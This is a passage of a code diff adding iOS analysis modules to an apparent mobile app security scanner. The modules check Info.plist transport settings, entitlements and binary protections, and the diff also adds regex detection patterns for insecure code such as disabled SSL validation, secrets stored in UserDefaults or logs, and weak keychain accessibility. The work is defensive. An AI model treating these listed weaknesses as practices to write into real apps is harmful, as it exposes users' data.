+      "NSRemindersUsageDescription",
+      "NSHealthShareUsageDescription",
+      "NSHealthUpdateUsageDescription",
+      "NSMotionUsageDescription",
+      "NSBluetoothPeripheralUsageDescription",
+      "NSBluetoothAlwaysUsageDescription",
+      "NSSpeechRecognitionUsageDescription",
+      "NSFaceIDUsageDescription",
+      "NSHomeKitUsageDescription",
+    ]
+    for (const key of usageKeys) {
+      const value = getValue(key)
+      if (value) {
+        usageDescriptions[key] = value
+      }
+    }
+
+    // Parse capabilities
+    const capabilities = getArrayValues("UIRequiredDeviceCapabilities")
+
+    // Parse app groups
+    const appGroups = getArrayValues("com.apple.security.application-groups")
+
+    // Parse associated domains
+    const associatedDomains = getArrayValues("com.apple.developer.associated-domains")
+
+    // Parse document types
+    const documentTypes = getArrayValues("CFBundleDocumentTypes")
+
+    // Parse exported types
+    const exportedTypes = getArrayValues("UTExportedTypeDeclarations")
+
+    // Parse supported orientations
+    const supportedInterfaceOrientations = getArrayValues("UISupportedInterfaceOrientations")
+
+    // Parse ATS settings
+    const atsSettings = parseATSSettings(xml)
+
+    return {
+      bundleId,
+      bundleName,
+      bundleDisplayName,
+      version,
+      buildVersion,
+      minOSVersion,
+      deviceFamily,
+      atsSettings,
+      urlSchemes,
+      queriedUrlSchemes,
+      backgroundModes,
+      usageDescriptions,
+      capabilities,
+      appGroups,
+      associatedDomains,
+      documentTypes,
+      exportedTypes,
+      supportedInterfaceOrientations,
+    }
+  }
+
+  /**
+   * Parse App Transport Security settings.
+   */
+  function parseATSSettings(xml: string): MobileScanTypes.ATSSettings {
+    const ats: MobileScanTypes.ATSSettings = {
+      allowsArbitraryLoads: false,
+      allowsArbitraryLoadsForMedia: false,
+      allowsArbitraryLoadsInWebContent: false,
+      allowsLocalNetworking: false,
+      exceptionDomains: {},
+    }
+
+    const atsMatch = xml.match(/<key>NSAppTransportSecurity<\/key>\s*<dict>([\s\S]*?)<\/dict>/i)
+    if (!atsMatch) return ats
+
+    const atsContent = atsMatch[1]
+
+    // Check boolean flags
+    if (/<key>NSAllowsArbitraryLoads<\/key>\s*<true\s*\/>/.test(atsContent)) {
+      ats.allowsArbitraryLoads = true
+    }
+    if (/<key>NSAllowsArbitraryLoadsForMedia<\/key>\s*<true\s*\/>/.test(atsContent)) {
+      ats.allowsArbitraryLoadsForMedia = true
+    }
+    if (/<key>NSAllowsArbitraryLoadsInWebContent<\/key>\s*<true\s*\/>/.test(atsContent)) {
+      ats.allowsArbitraryLoadsInWebContent = true
+    }
+    if (/<key>NSAllowsLocalNetworking<\/key>\s*<true\s*\/>/.test(atsContent)) {
+      ats.allowsLocalNetworking = true
+    }
+
+    // Parse exception domains
+    const exceptionMatch = atsContent.match(/<key>NSExceptionDomains<\/key>\s*<dict>([\s\S]*?)<\/dict>/i)
+    if (exceptionMatch) {
+      const domainsContent = exceptionMatch[1]
+      const domainMatches = domainsContent.matchAll(/<key>([^<]+)<\/key>\s*<dict>([\s\S]*?)<\/dict>/g)
+
+      for (const dm of domainMatches) {
+        const domain = dm[1]
+        const domainConfig = dm[2]
+
+        ats.exceptionDomains[domain] = {
+          includesSubdomains: /<key>NSIncludesSubdomains<\/key>\s*<true\s*\/>/.test(domainConfig),
+          allowsInsecureHTTPLoads: /<key>NSExceptionAllowsInsecureHTTPLoads<\/key>\s*<true\s*\/>/.test(domainConfig) ||
+            /<key>NSTemporaryExceptionAllowsInsecureHTTPLoads<\/key>\s*<true\s*\/>/.test(domainConfig),
+          requiresForwardSecrecy: !/<key>NSExceptionRequiresForwardSecrecy<\/key>\s*<false\s*\/>/.test(domainConfig),
+          minimumTLSVersion: domainConfig.match(/<key>NSExceptionMinimumTLSVersion<\/key>\s*<string>([^<]*)<\/string>/)?.[1],
+        }
+      }
+    }
+
+    return ats
+  }
+
+  /**
+   * Analyze Info.plist for security issues.
+   */
+  export function analyze(
+    plist: MobileScanTypes.IOSPlist,
+    scanId: string,
+    appId: string
+  ): MobileScanTypes.MobileFinding[] {
+    log.info("Analyzing iOS plist", { bundleId: plist.bundleId })
+
+    const findings: MobileScanTypes.MobileFinding[] = []
+
+    // Analyze ATS settings
+    findings.push(...analyzeATS(plist.atsSettings, scanId, appId))
+
+    // Analyze URL schemes
+    if (plist.urlSchemes.length > 0) {
+      const customSchemes = plist.urlSchemes.filter(
+        (s) => !["http", "https", "mailto", "tel", "sms"].includes(s.toLowerCase())
+      )
+
+      if (customSchemes.length > 0) {
+        findings.push(createFinding(scanId, appId, {
+          title: "Custom URL Schemes Registered",
+          description: `The application registers ${customSchemes.length} custom URL scheme(s): ${customSchemes.join(", ")}. URL schemes can be claimed by any app and may be vulnerable to URL scheme hijacking.`,
+          severity: "info",
+          owaspMobile: "M8",
+          category: "configuration",
+          evidence: customSchemes.join(", "),
+          recommendation:
+            "Use Universal Links instead of custom URL schemes for secure deep linking. If URL schemes are required, validate the source app.",
+        }))
+      }
+    }
+
+    // Analyze background modes
+    const sensitiveBackgroundModes = ["audio", "location", "voip", "fetch", "remote-notification", "bluetooth-central"]
+    const usedSensitiveModes = plist.backgroundModes.filter((m) => sensitiveBackgroundModes.includes(m))
+
+    if (usedSensitiveModes.length > 0) {
+      findings.push(createFinding(scanId, appId, {
+        title: "Sensitive Background Modes Enabled",
+        description: `The application uses sensitive background modes: ${usedSensitiveModes.join(", ")}. These modes allow the app to run in the background and may have privacy implications.`,
+        severity: "info",
+        owaspMobile: "M6",
+        category: "privacy",
+        evidence: usedSensitiveModes.join(", "),
+        recommendation: "Ensure background modes are necessary for app functionality and document them for App Store review.",
+      }))
+    }
+
+    // Check for missing usage descriptions
+    const expectedDescriptions = [
+      { key: "NSCameraUsageDescription", description: "camera" },
+      { key: "NSMicrophoneUsageDescription", description: "microphone" },
+      { key: "NSPhotoLibraryUsageDescription", description: "photo library" },
+      { key: "NSLocationWhenInUseUsageDescription", description: "location" },
+    ]
+
+    for (const expected of expectedDescriptions) {
+      if (!plist.usageDescriptions[expected.key] && plist.capabilities.includes(expected.description)) {
+        findings.push(createFinding(scanId, appId, {
+          title: `Missing Usage Description: ${expected.key}`,
+          description: `The application may access ${expected.description} but doesn't provide a usage description. This will cause a crash on modern iOS versions.`,
+          severity: "high",
+          owaspMobile: "M6",
+          category: "privacy",
+          recommendation: `Add ${expected.key} to Info.plist with a clear explanation of why the app needs ${expected.description} access.`,
+        }))
+      }
+    }
+
+    // Check minimum iOS version
+    const minVersion = parseFloat(plist.minOSVersion)
+    if (minVersion < 12.0) {
+      findings.push(createFinding(scanId, appId, {
+        title: "Low Minimum iOS Version",
+        description: `The application supports iOS ${plist.minOSVersion}. Older iOS versions lack important security features.`,
+        severity: "low",
+        owaspMobile: "M8",
+        category: "configuration",
+        evidence: `MinimumOSVersion=${plist.minOSVersion}`,
+        recommendation: "Consider increasing the minimum iOS version to at least 12.0 for better security features.",
+      }))
+    }
+
+    return findings
+  }
+
+  /**
+   * Analyze App Transport Security settings.
+   */
+  function analyzeATS(
+    ats: MobileScanTypes.ATSSettings | undefined,
+    scanId: string,
+    appId: string
+  ): MobileScanTypes.MobileFinding[] {
+    const findings: MobileScanTypes.MobileFinding[] = []
+
+    if (!ats) {
+      // ATS is enabled by default - this is good
+      return findings
+    }
+
+    // Check for arbitrary loads
+    if (ats.allowsArbitraryLoads) {
+      findings.push(createFinding(scanId, appId, {
+        title: "App Transport Security Disabled",
+        description:
+          "NSAllowsArbitraryLoads is set to true, which disables App Transport Security for all connections. This allows insecure HTTP connections.",
+        severity: "high",
+        owaspMobile: "M5",
+        category: "network",
+        evidence: "NSAllowsArbitraryLoads=true",
+        recommendation:
+          "Remove NSAllowsArbitraryLoads=true. Use NSExceptionDomains for specific domains that require HTTP.",
+      }))
+    }
+
+    // Check for arbitrary loads in WebViews
+    if (ats.allowsArbitraryLoadsInWebContent) {
+      findings.push(createFinding(scanId, appId, {
+        title: "ATS Disabled for WebView Content",
+        description:
+          "NSAllowsArbitraryLoadsInWebContent is enabled, allowing WebViews to load insecure HTTP content.",
+        severity: "medium",
+        owaspMobile: "M5",
+        category: "network",
+        evidence: "NSAllowsArbitraryLoadsInWebContent=true",
+        recommendation: "Consider disabling arbitrary loads in WebView content if not strictly necessary.",
+      }))
+    }
+
+    // Check exception domains
+    if (Object.keys(ats.exceptionDomains).length > 0) {
+      for (const [domain, config] of Object.entries(ats.exceptionDomains)) {
+        if (config.allowsInsecureHTTPLoads) {
+          findings.push(createFinding(scanId, appId, {
+            title: `ATS Exception: HTTP Allowed for ${domain}`,
+            description: `The domain ${domain} is configured to allow insecure HTTP connections.${config.includesSubdomains ? " This includes all subdomains." : ""}`,
+            severity: "medium",
+            owaspMobile: "M5",
+            category: "network",
+            evidence: `Domain=${domain}, InsecureHTTP=true`,
+            recommendation: `Upgrade ${domain} to use HTTPS and remove the ATS exception.`,
+          }))
+        }
+
+        if (config.requiresForwardSecrecy === false) {
+          findings.push(createFinding(scanId, appId, {
+            title: `ATS Exception: Forward Secrecy Not Required for ${domain}`,
+            description: `The domain ${domain} does not require forward secrecy, allowing weaker TLS cipher suites.`,
+            severity: "low",
+            owaspMobile: "M5",
+            category: "network",
+            evidence: `Domain=${domain}, ForwardSecrecy=false`,
+            recommendation: "Configure the server to support forward secrecy and remove this exception.",
+          }))
+        }
+
+        if (config.minimumTLSVersion && parseFloat(config.minimumTLSVersion.replace("TLSv", "")) < 1.2) {
+          findings.push(createFinding(scanId, appId, {
+            title: `ATS Exception: Weak TLS Version for ${domain}`,
+            description: `The domain ${domain} allows TLS ${config.minimumTLSVersion}, which is considered weak.`,
+            severity: "medium",
+            owaspMobile: "M5",
+            category: "network",
+            evidence: `Domain=${domain}, MinTLS=${config.minimumTLSVersion}`,
+            recommendation: "Upgrade the server to support TLS 1.2 or higher and remove this exception.",
+          }))
+        }
+      }
+    }
+
+    return findings
+  }
+
+  /**
+   * Format plist summary.
+   */
+  export function formatSummary(plist: MobileScanTypes.IOSPlist): string {
+    const lines: string[] = []
+
+    lines.push(`Bundle ID: ${plist.bundleId}`)
+    lines.push(`Bundle Name: ${plist.bundleName}`)
+    lines.push(`Version: ${plist.version} (${plist.buildVersion})`)
+    lines.push(`Min iOS Version: ${plist.minOSVersion}`)
+    lines.push("")
+    lines.push("App Transport Security:")
+    if (plist.atsSettings) {
+      lines.push(`  Arbitrary Loads: ${plist.atsSettings.allowsArbitraryLoads ? "Allowed (WARNING)" : "Blocked"}`)
+      lines.push(`  Exception Domains: ${Object.keys(plist.atsSettings.exceptionDomains).length}`)
+    } else {
+      lines.push("  Default (secure)")
+    }
+    lines.push("")
+    lines.push(`URL Schemes: ${plist.urlSchemes.length > 0 ? plist.urlSchemes.join(", ") : "None"}`)
+    lines.push(`Background Modes: ${plist.backgroundModes.length > 0 ? plist.backgroundModes.join(", ") : "None"}`)
+    lines.push(`Privacy Descriptions: ${Object.keys(plist.usageDescriptions).length}`)
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Create finding helper.
+   */
+  function createFinding(
+    scanId: string,
+    appId: string,
+    data: {
+      title: string
+      description: string
+      severity: MobileScanTypes.Severity
+      owaspMobile: MobileScanTypes.OwaspMobile
+      category: string
+      evidence?: string
+      recommendation?: string
+    }
+  ): MobileScanTypes.MobileFinding {
+    return {
+      id: MobileScanStorage.createFindingId(),
+      scanId,
+      appId,
+      platform: "ios",
+      title: data.title,
+      description: data.description,
+      severity: data.severity,
+      owaspMobile: data.owaspMobile,
+      category: data.category,
+      evidence: data.evidence,
+      recommendation: data.recommendation || "Review and fix the security issue.",
+      references: [],
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/mobilescan/ios/security.ts b/packages/opencode/src/pentest/mobilescan/ios/security.ts
new file mode 100644
index 00000000000..6a4850ed42e
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/ios/security.ts
@@ -0,0 +1,534 @@
+/**
+ * @fileoverview iOS Security Analysis
+ *
+ * Analyzes iOS applications for binary protections, entitlements, and security issues.
+ *
+ * @module pentest/mobilescan/ios/security
+ */
+
+import { MobileScanTypes } from "../types"
+import { MobileScanStorage } from "../storage"
+import { Log } from "../../../util/log"
+import { promises as fs } from "fs"
+
+const log = Log.create({ service: "mobilescan.ios.security" })
+
+/**
+ * iOS security analyzer namespace.
+ */
+export namespace iOSSecurityAnalyzer {
+  // ============================================
+  // Entitlements Analysis
+  // ============================================
+
+  /**
+   * Parse entitlements plist.
+   */
+  export function parseEntitlements(xml: string): MobileScanTypes.IOSEntitlements {
+    const getValue = (key: string): string | undefined => {
+      const regex = new RegExp(`<key>${key.replace(/\./g, "\\.")}</key>\\s*<string>([^<]*)</string>`, "i")
+      const match = xml.match(regex)
+      return match ? match[1] : undefined
+    }
+
+    const getBoolValue = (key: string): boolean | undefined => {
+      const trueRegex = new RegExp(`<key>${key.replace(/\./g, "\\.")}</key>\\s*<true\\s*/?>`, "i")
+      const falseRegex = new RegExp(`<key>${key.replace(/\./g, "\\.")}</key>\\s*<false\\s*/?>`, "i")
+      if (trueRegex.test(xml)) return true
+      if (falseRegex.test(xml)) return false
+      return undefined
+    }
+
+    const getArrayValues = (key: string): string[] => {
+      const regex = new RegExp(`<key>${key.replace(/\./g, "\\.")}</key>\\s*<array>([\\s\\S]*?)</array>`, "i")
+      const match = xml.match(regex)
+      if (!match) return []
+
+      const values: string[] = []
+      const stringMatches = match[1].matchAll(/<string>([^<]*)<\/string>/g)
+      for (const m of stringMatches) {
+        values.push(m[1])
+      }
+      return values
+    }
+
+    return {
+      teamId: getValue("com.apple.developer.team-identifier"),
+      appId: getValue("application-identifier"),
+      getTaskAllow: getBoolValue("get-task-allow"),
+      keychainAccessGroups: getArrayValues("keychain-access-groups"),
+      appGroups: getArrayValues("com.apple.security.application-groups"),
+      associatedDomains: getArrayValues("com.apple.developer.associated-domains"),
+      pushNotifications: getBoolValue("aps-environment") !== undefined,
+      apsEnvironment: getValue("aps-environment"),
+      networkExtensions: getArrayValues("com.apple.developer.networking.networkextension"),
+      healthKit: getBoolValue("com.apple.developer.healthkit"),
+      homeKit: getBoolValue("com.apple.developer.homekit"),
+      siri: getBoolValue("com.apple.developer.siri"),
+      applePay: getBoolValue("com.apple.developer.in-app-payments") !== undefined,
+      cloudKit: getBoolValue("com.apple.developer.ubiquity-container-identifiers") !== undefined,
+      icloud: getBoolValue("com.apple.developer.icloud-container-identifiers") !== undefined,
+      inAppPurchase: getBoolValue("com.apple.developer.in-app-purchase") !== undefined,
+      gameCenter: getBoolValue("com.apple.developer.game-center") !== undefined,
+      dataProtection: getValue("com.apple.developer.default-data-protection"),
+      customEntitlements: {},
+    }
+  }
+
+  /**
+   * Analyze entitlements for security issues.
+   */
+  export function analyzeEntitlements(
+    entitlements: MobileScanTypes.IOSEntitlements,
+    scanId: string,
+    appId: string
+  ): MobileScanTypes.MobileFinding[] {
+    log.info("Analyzing iOS entitlements")
+
+    const findings: MobileScanTypes.MobileFinding[] = []
+
+    // Check for debug entitlement
+    if (entitlements.getTaskAllow === true) {
+      findings.push(createFinding(scanId, appId, {
+        title: "Debug Entitlement Enabled",
+        description:
+          "The get-task-allow entitlement is set to true, indicating this is a development/debug build. This allows debugging and should not be present in production.",
+        severity: "high",
+        owaspMobile: "M8",
+        category: "entitlements",
+        evidence: "get-task-allow=true",
+        recommendation: "Ensure production builds do not include get-task-allow=true.",
+      }))
+    }
+
+    // Check APS environment
+    if (entitlements.apsEnvironment === "development") {
+      findings.push(createFinding(scanId, appId, {
+        title: "Development Push Notification Environment",
+        description:
+          "The app uses the development push notification environment. Production apps should use the production environment.",
+        severity: "low",
+        owaspMobile: "M8",
+        category: "entitlements",
+        evidence: "aps-environment=development",
+        recommendation: "Use production push notification environment for App Store builds.",
+      }))
+    }
+
+    // Check data protection
+    if (entitlements.dataProtection) {
+      const protectionLevels: Record<string, { severity: MobileScanTypes.Severity; recommendation: string }> = {
+        "NSFileProtectionNone": {
+          severity: "high",
+          recommendation: "Use NSFileProtectionComplete or NSFileProtectionCompleteUnlessOpen for sensitive data.",
+        },
+        "NSFileProtectionCompleteUntilFirstUserAuthentication": {
+          severity: "medium",
+          recommendation:
+            "Consider using NSFileProtectionComplete for highly sensitive data that should only be accessible when the device is unlocked.",
+        },
+      }
+
+      const protection = protectionLevels[entitlements.dataProtection]
+      if (protection) {
+        findings.push(createFinding(scanId, appId, {
+          title: `Data Protection Level: ${entitlements.dataProtection}`,
+          description: `The app uses ${entitlements.dataProtection} data protection level.`,
+          severity: protection.severity,
+          owaspMobile: "M9",
+          category: "entitlements",
+          evidence: entitlements.dataProtection,
+          recommendation: protection.recommendation,
+        }))
+      }
+    }
+
+    // Check keychain access groups
+    if (entitlements.keychainAccessGroups.length > 1) {
+      findings.push(createFinding(scanId, appId, {
+        title: "Multiple Keychain Access Groups",
+        description: `The app has access to ${entitlements.keychainAccessGroups.length} keychain access groups, which may allow data sharing with other apps.`,
+        severity: "info",
+        owaspMobile: "M9",
+        category: "entitlements",
+        evidence: entitlements.keychainAccessGroups.join(", "),
+        recommendation: "Ensure keychain sharing is intentional and that shared data is appropriately protected.",
+      }))
+    }
+
+    // Check app groups
+    if (entitlements.appGroups.length > 0) {
+      findings.push(createFinding(scanId, appId, {
+        title: "App Groups Configured",
+        description: `The app uses ${entitlements.appGroups.length} app group(s) for data sharing: ${entitlements.appGroups.join(", ")}`,
+        severity: "info",
+        owaspMobile: "M9",
+        category: "entitlements",
+        evidence: entitlements.appGroups.join(", "),
+        recommendation: "Ensure app group shared data is encrypted and access is properly controlled.",
+      }))
+    }
+
+    return findings
+  }
+
+  // ============================================
+  // Binary Protection Analysis
+  // ============================================
+
+  /**
+   * Analyze binary protections.
+   */
+  export function analyzeBinaryProtections(
+    protections: MobileScanTypes.BinaryProtections,
+    scanId: string,
+    appId: string
+  ): MobileScanTypes.MobileFinding[] {
+    log.info("Analyzing iOS binary protections")
+
+    const findings: MobileScanTypes.MobileFinding[] = []
+
+    // Check PIE (Position Independent Executable)
+    if (!protections.pie) {
+      findings.push(createFinding(scanId, appId, {
+        title: "Position Independent Executable (PIE) Disabled",
+        description:
+          "The binary is not compiled as a Position Independent Executable. PIE enables ASLR (Address Space Layout Randomization) which makes exploitation harder.",
+        severity: "high",
+        owaspMobile: "M7",
+        category: "binary",
+        evidence: "PIE=false",
+        recommendation: "Enable PIE in the build settings (Position Independent Code).",
+      }))
+    }
+
+    // Check ARC (Automatic Reference Counting)
+    if (!protections.arc) {
+      findings.push(createFinding(scanId, appId, {
+        title: "Automatic Reference Counting (ARC) Not Detected",
+        description:
+          "ARC does not appear to be enabled for all code. ARC helps prevent memory corruption vulnerabilities.",
+        severity: "medium",
+        owaspMobile: "M7",
+        category: "binary",
+        evidence: "ARC=false",
+        recommendation: "Enable ARC for all source files in the project.",
+      }))
+    }
+
+    // Check Stack Canary
+    if (!protections.stackCanary) {
+      findings.push(createFinding(scanId, appId, {
+        title: "Stack Canary Protection Missing",
+        description:
+          "Stack canary protection is not enabled. Stack canaries help detect buffer overflow attacks.",
+        severity: "medium",
+        owaspMobile: "M7",
+        category: "binary",
+        evidence: "StackCanary=false",
+        recommendation:
+          "Enable stack protector in build settings (-fstack-protector-all compiler flag).",
+      }))
+    }
+
+    // Check code signature
+    if (!protections.codeSignature) {
+      findings.push(createFinding(scanId, appId, {
+        title: "Code Signature Missing",
+        description: "The binary does not appear to be code signed, which is required for iOS apps.",
+        severity: "high",
+        owaspMobile: "M7",
+        category: "binary",
+        evidence: "CodeSignature=false",
+        recommendation: "Ensure the app is properly code signed before distribution.",
+      }))
+    }
+
+    // Check if symbols are stripped
+    if (protections.symbols) {
+      findings.push(createFinding(scanId, appId, {
+        title: "Debug Symbols Present",
+        description:
+          "The binary contains debug symbols, which makes reverse engineering easier and increases app size.",
+        severity: "low",
+        owaspMobile: "M7",
+        category: "binary",
+        evidence: "Symbols=true",
+        recommendation:
+          "Strip debug symbols from release builds (Strip Debug Symbols During Copy = Yes).",
+      }))
+    }
+
+    // Check encryption
+    if (!protections.encrypted) {
+      findings.push(createFinding(scanId, appId, {
+        title: "Binary Not Encrypted",
+        description:
+          "The binary does not appear to be encrypted with FairPlay DRM. App Store apps are automatically encrypted.",
+        severity: "info",
+        owaspMobile: "M7",
+        category: "binary",
+        evidence: "Encrypted=false",
+        recommendation:
+          "This is expected for development builds. App Store distribution will apply FairPlay encryption.",
+      }))
+    }
+
+    return findings
+  }
+
+  // ============================================
+  // Keychain Analysis
+  // ============================================
+
+  /**
+   * Keychain access patterns to detect.
+   */
+  export const KEYCHAIN_PATTERNS = [
+    {
+      name: "kSecAttrAccessibleAlways",
+      pattern: /kSecAttrAccessibleAlways(?!After)/,
+      severity: "high" as MobileScanTypes.Severity,
+      description: "Keychain item accessible always, even when device is locked",
+      recommendation: "Use kSecAttrAccessibleWhenUnlocked or kSecAttrAccessibleWhenUnlockedThisDeviceOnly",
+    },
+    {
+      name: "kSecAttrAccessibleAlwaysThisDeviceOnly",
+      pattern: /kSecAttrAccessibleAlwaysThisDeviceOnly/,
+      severity: "medium" as MobileScanTypes.Severity,
+      description: "Keychain item accessible always on this device",
+      recommendation: "Consider using kSecAttrAccessibleWhenUnlockedThisDeviceOnly for sensitive data",
+    },
+    {
+      name: "kSecAttrAccessibleAfterFirstUnlock",
+      pattern: /kSecAttrAccessibleAfterFirstUnlock(?!ThisDeviceOnly)/,
+      severity: "low" as MobileScanTypes.Severity,
+      description: "Keychain item accessible after first unlock",
+      recommendation: "For highly sensitive data, use kSecAttrAccessibleWhenUnlocked",
+    },
+    {
+      name: "kSecAttrSynchronizable_YES",
+      pattern: /kSecAttrSynchronizable.*true|kCFBooleanTrue/,
+      severity: "medium" as MobileScanTypes.Severity,
+      description: "Keychain item synchronized via iCloud",
+      recommendation: "Ensure iCloud Keychain sync is appropriate for this data type",
+    },
+  ]
+
+  /**
+   * Analyze keychain usage in source files.
+   */
+  export async function analyzeKeychain(
+    sourceFiles: string[],
+    scanId: string,
+    appId: string
+  ): Promise<MobileScanTypes.MobileFinding[]> {
+    log.info("Analyzing iOS keychain usage", { fileCount: sourceFiles.length })
+
+    const findings: MobileScanTypes.MobileFinding[] = []
+
+    for (const file of sourceFiles) {
+      try {
+        const content = await fs.readFile(file, "utf-8")
+        const lines = content.split("\n")
+
+        for (const pattern of KEYCHAIN_PATTERNS) {
+          for (let i = 0; i < lines.length; i++) {
+            if (pattern.pattern.test(lines[i])) {
+              findings.push(createFinding(scanId, appId, {
+                title: `Keychain: ${pattern.name}`,
+                description: pattern.description,
+                severity: pattern.severity,
+                owaspMobile: "M9",
+                category: "keychain",
+                codeLocation: {
+                  file,
+                  line: i + 1,
+                  snippet: lines[i].trim(),
+                },
+                evidence: lines[i].trim(),
+                recommendation: pattern.recommendation,
+              }))
+            }
+          }
+        }
+
+        // Check for missing biometric protection for sensitive data
+        if (
+          content.includes("SecItemAdd") &&
+          !content.includes("kSecAccessControlBiometryCurrentSet") &&
+          !content.includes("kSecAccessControlUserPresence")
+        ) {
+          findings.push(createFinding(scanId, appId, {
+            title: "Keychain Item Without Biometric Protection",
+            description:
+              "Keychain items are being stored without biometric or user presence verification.",
+            severity: "info",
+            owaspMobile: "M9",
+            category: "keychain",
+            codeLocation: { file },
+            recommendation:
+              "Consider using kSecAccessControlBiometryCurrentSet for sensitive keychain items.",
+          }))
+        }
+      } catch {
+        // Skip files that can't be read
+      }
+    }
+
+    return findings
+  }
+
+  // ============================================
+  // Code Analysis
+  // ============================================
+
+  /**
+   * iOS-specific security patterns.
+   */
+  export const IOS_SECURITY_PATTERNS = [
+    // Insecure data storage
+    {
+      name: "UserDefaults sensitive data",
+      pattern: /UserDefaults.*(?:password|token|secret|key|credential)/i,
+      severity: "high" as MobileScanTypes.Severity,
+      owaspMobile: "M9" as MobileScanTypes.OwaspMobile,
+      description: "Sensitive data stored in UserDefaults (unencrypted)",
+      recommendation: "Store sensitive data in Keychain instead of UserDefaults",
+    },
+    // Insecure communication
+    {
+      name: "Disabled SSL validation",
+      pattern:
+        /allowInvalidCertificates\s*=\s*true|didReceive.*challenge.*completionHandler.*useCredential|URLCredential.*serverTrust/,
+      severity: "critical" as MobileScanTypes.Severity,
+      owaspMobile: "M5" as MobileScanTypes.OwaspMobile,
+      description: "SSL certificate validation appears to be disabled",
+      recommendation: "Do not disable SSL certificate validation. Implement proper certificate pinning if needed.",
+    },
+    // Clipboard
+    {
+      name: "Sensitive clipboard data",
+      pattern: /UIPasteboard.*(?:password|token|secret|key)/i,
+      severity: "medium" as MobileScanTypes.Severity,
+      owaspMobile: "M9" as MobileScanTypes.OwaspMobile,
+      description: "Sensitive data may be copied to clipboard",
+      recommendation: "Avoid copying sensitive data to clipboard. Use secure text fields that prevent copying.",
+    },
+    // WebView
+    {
+      name: "JavaScript enabled in WKWebView",
+      pattern: /WKWebViewConfiguration.*javaScriptEnabled\s*=\s*true|\.javaScriptEnabled\s*=\s*true/,
+      severity: "low" as MobileScanTypes.Severity,
+      owaspMobile: "M8" as MobileScanTypes.OwaspMobile,
+      description: "JavaScript is enabled in WKWebView",
+      recommendation:
+        "Only enable JavaScript if necessary. Implement proper content security policies.",
+    },
+    // Logging
+    {
+      name: "Sensitive logging",
+      pattern: /(?:NSLog|print|os_log|Logger).*(?:password|token|secret|key|credential)/i,
+      severity: "high" as MobileScanTypes.Severity,
+      owaspMobile: "M9" as MobileScanTypes.OwaspMobile,
+      description: "Sensitive data may be logged",
+      recommendation: "Remove logging of sensitive data. Use #if DEBUG for debug-only logging.",
+    },
+    // Biometric bypass
+    {
+      name: "Weak biometric check",
+      pattern: /evaluatePolicy.*success.*true|canEvaluatePolicy/,
+      severity: "info" as MobileScanTypes.Severity,
+      owaspMobile: "M3" as MobileScanTypes.OwaspMobile,
+      description: "Local biometric authentication detected",
+      recommendation:
+        "Ensure biometric authentication is tied to Keychain operations, not just a local boolean check.",
+    },
+  ]
+
+  /**
+   * Analyze iOS source files for security issues.
+   */
+  export async function analyzeSourceFiles(
+    sourceFiles: string[],
+    scanId: string,
+    appId: string
+  ): Promise<MobileScanTypes.MobileFinding[]> {
+    log.info("Analyzing iOS source files", { fileCount: sourceFiles.length })
+
+    const findings: MobileScanTypes.MobileFinding[] = []
+
+    for (const file of sourceFiles) {
+      try {
+        const content = await fs.readFile(file, "utf-8")
+        const lines = content.split("\n")
+
+        for (const pattern of IOS_SECURITY_PATTERNS) {
+          for (let i = 0; i < lines.length; i++) {
+            if (pattern.pattern.test(lines[i])) {
+              findings.push(createFinding(scanId, appId, {
+                title: pattern.name,
+                description: pattern.description,
+                severity: pattern.severity,
+                owaspMobile: pattern.owaspMobile,
+                category: "code",
+                codeLocation: {
+                  file,
+                  line: i + 1,
+                  snippet: lines[i].trim(),
+                },
+                evidence: lines[i].trim(),
+                recommendation: pattern.recommendation,
+              }))
+            }
+          }
+        }
+      } catch {
+        // Skip files that can't be read
+      }
+    }
+
+    return findings
+  }
+
+  // ============================================
+  // Helper Functions
+  // ============================================
+
+  /**
+   * Create finding helper.
+   */
+  function createFinding(
+    scanId: string,
+    appId: string,
+    data: {
+      title: string
+      description: string
+      severity: MobileScanTypes.Severity
+      owaspMobile: MobileScanTypes.OwaspMobile
+      category: string
+      codeLocation?: MobileScanTypes.CodeLocation
+      evidence?: string
+      recommendation?: string
+    }
+  ): MobileScanTypes.MobileFinding {
+    return {
+      id: MobileScanStorage.createFindingId(),
+      scanId,
+      appId,
+      platform: "ios",
+      title: data.title,
+      description: data.description,
+      severity: data.severity,
+      owaspMobile: data.owaspMobile,
+      category: data.category,
+      codeLocation: data.codeLocation,
+      evidence: data.evidence,
+      recommendation: data.recommendation || "Review and fix the security issue.",
+      references: [],
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/mobilescan/orchestrator.ts b/packages/opencode/src/pentest/mobilescan/orchestrator.ts
new file mode 100644
index 00000000000..892b5f55c09
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/orchestrator.ts
@@ -0,0 +1,794 @@
+/**
+ * @fileoverview Mobile Scan Orchestrator
+ *
+ * Coordinates all mobile scanning modules based on scan profiles.
+ *
+ * @module pentest/mobilescan/orchestrator
+ */
+
+import * as path from "path"
+import * as fs from "fs/promises"
+import * as crypto from "crypto"
+import { MobileScanTypes } from "./types"
+import { MobileScanEvents } from "./events"
+import { MobileScanStorage } from "./storage"
+import { MobileScanProfiles } from "./profiles"
+import { ApktoolParser } from "./parsers/apktool"
+import { JadxParser } from "./parsers/jadx"
+import { MobsfParser } from "./parsers/mobsf"
+import { ManifestAnalyzer } from "./android/manifest"
+import { PermissionAnalyzer } from "./android/permissions"
+import { ComponentAnalyzer } from "./android/components"
+import { AndroidSecurityAnalyzer } from "./android/security"
+import { PlistAnalyzer } from "./ios/plist"
+import { iOSSecurityAnalyzer } from "./ios/security"
+import { SSLPinningDetector } from "./common/ssl-pinning"
+import { RootDetector } from "./common/root-detection"
+import { ApiKeyExtractor } from "./common/api-keys"
+import { UrlExtractor } from "./common/urls"
+import { Bus } from "../../bus"
+import { Log } from "../../util/log"
+import { execSync } from "child_process"
+
+const log = Log.create({ service: "mobilescan.orchestrator" })
+
+/**
+ * Orchestrator options.
+ */
+export interface OrchestratorOptions {
+  profile?: MobileScanTypes.ProfileId
+  customProfile?: Partial<MobileScanTypes.ScanProfile>
+  outputDir?: string
+  mobsfUrl?: string
+  mobsfApiKey?: string
+  timeout?: number
+  storageConfig?: { storage?: "file" | "memory" }
+}
+
+/**
+ * Mobile scan orchestrator namespace.
+ */
+export namespace MobileScanOrchestrator {
+  /**
+   * Analyze a mobile application.
+   */
+  export async function analyze(
